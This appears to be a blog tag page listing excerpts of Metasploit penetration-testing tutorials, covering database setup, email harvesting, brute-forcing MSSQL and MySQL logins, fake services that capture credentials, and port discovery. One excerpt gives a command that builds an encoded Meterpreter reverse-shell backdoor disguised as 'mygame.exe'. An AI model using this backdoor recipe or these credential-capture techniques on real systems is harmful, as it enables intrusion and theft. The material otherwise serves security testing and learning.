Tag: metasploit


Setup Metasploit Database

Try reconfigure Metasploit dpkg-reconfigure metasploit-frameworkdpkg-reconfigure metasploit-framework Start postgresql systemctl start postgresql.servicesystemctl start postgresql.service Initialize database msfdb initmsfdb init Run metasploit msfconsolemsfconsole Connect to database db_connect -y /usr/share/metasploit-framework/config/database.ymldb_connect -y /usr/share/metasploit-framework/config/database.yml Rebuild cache db_rebuild_cachedb_rebuild_cache Run postgresql at startup systemctl enable postgresql.servicesystemctl enable postgresql.service


How to generate shellcode from custom exe in metasploit

To use a custom exe as a payload or to use your custom exe in a document or excel file, you have to “convert” your exe to shellcode. To accomplish this: 1> Run Kali Linux 2> Open a terminal window 3> Type msfconsolemsfconsole and hit enter 4> Type use payload/generic/customuse payload/generic/custom and hit enter 5> …

Information Gathering, Metasploit, Reconnaissance

Email harvesting with Metasploit

Email harvesting is the process of obtaining lists of email addresses using various methods. You can check on your own what emails, attackers are going to find about your domain using Metasploit’s module, Search Engine Domain Email Address Collector. This module uses Google, Bing and Yahoo to create a list of valid email addresses for …

Backdoors, Metasploit

Create crypted Backdoor with Metasploit and Backtrack

We will use windows/meterpreter/reverse_tcp payload. We will encode payload 10 times with shikata_ga_nai and 10 times with call4_dword_xor.   1. Open console window   2. Type: msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t exe -c 10 -o mygame.exemsfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R | msfencode …

Metasploit, Phishing

MSSQL Phishing with metasploit

Metasploit has a mssql capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weak encoded database logins as well as Windows logins (NTLM).   To select the capture module type: use auxiliary/server/capture/mssqluse auxiliary/server/capture/mssql   Options You can set CAINPWFILE …

Metasploit, MSSQL

Brute forcing Microsoft SQL Server

Metasploit offers auxiliary module mssql_login. This module will query the MSSQL instance for a specific username and password pair.   The default administrator’s username for SQL server is sa. In the options of this module, you can specify a specific password, or a password list, a username list or a username-password list where usernames and …

Metasploit, MSSQL

Detecting a Microsoft SQL Server

Microsoft SQL Server (MSSQL) is a relational database management system (RDMS) used to store, retrieve and manage information. As with many Microsoft’s products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.   Discover open MSSQL ports MSSQL is running by default on port 1433. To discover SQL …

Metasploit, Phishing

Let’s go Phishing

Phishing is an attempt to steal sensitive information by impersonating a well known organization or website. In the same manner you can trick a user to steal her MySQL credentials. One of the abilities of Metasploit is this, mimic known services and capture user credentials. Among the various capture modules there is a module called …

Brute-force, Databases, Metasploit, MySQL

Brute forcing MySQL

There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL server for specific usernames and passwords.   To start your attack you have to set the RHOSTS option and choose a username and a password if you would like a single login query. SET RHOSTS RHOSTS Let’s try …

Metasploit, NMAP, Port Scanning

Discover open mysql ports

MySQL is running by default on port 3306. To discover MySQL you can do it either with nmap or with Metasploit’s auxiliary modules.   The NMAP way Nmap is a free and open source network discovery and security auditing utility. It can discover open ports, running services, operating system version and much more. To discover …